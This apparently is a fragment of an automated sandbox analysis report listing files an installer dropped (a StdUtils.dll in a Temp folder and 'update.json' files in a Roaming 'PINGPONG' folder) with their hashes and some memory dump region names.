MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

memory/432-1115-0x00007FFF35050000-0x00007FFF35051000-memory.dmp

memory/432-1114-0x00007FFF33350000-0x00007FFF33351000-memory.dmp

C:\Users\Admin\AppData\Roaming\PINGPONG\update.json

MD5 e8cf6c7ee80f77a0a79dba7a97d97470
SHA1 1c12356a241ce61b431f4d4a3719da84ede50c12
SHA256 d1e553d80f975fa4de37572216a85ed821b067a651b3ea984e72b6f0d5371ced
SHA512 b953d070133a9b18c111f4db8522e119eb02c8e4cdbed7abf9a1655db5164721fc05e4c426868cec407f3f8b80dbabd0cbe29938bd139107bf87d5a58c6917fb

C:\Users\Admin\AppData\Roaming\PINGPONG\update.json.tmp-702180473658589b

MD5 8cd6ce25af77dea1f67ad9260c42abe5
SHA1 1dfc78f5ecae6b8a6190efb336a603d5bdc659cb
SHA256 bf76282df785013c01e207753131e36107daafad84c8648ca72924babffe3896
SHA512 812147ee462529801c96a4552a8333057e09f3ee72fe27a666d26fd6780bfdda127b2256dacb3ce8e3347005f3349f7b94b38cc7ab3b175faae999f94efe6fdf

C:\Users\Admin\AppData\Roaming\PINGPONG\update.json.tmp-70218046320c5aa6

MD5 a4560713f58e76afbe94dc6a1de054f2
SHA1 e217aea039ae21566ae12c8130fdae7ffeccf95e
SHA256 8f31ca3cc25f966309bdc3dd5dd676fa046faa7a375b1064d334ca60132289be
SHA512 991c6e4e1c69fb4a524c716f93f6c3eea486cd0affca3a6e9f41ac64fd99fc96b665b30b84a1a47131b4fda4a2c52dbae367c999f56742ebc7756f6d260860e9

memory/4204-2944-0x0000000000AE0000-0x0000000000AEC000-memory.dmp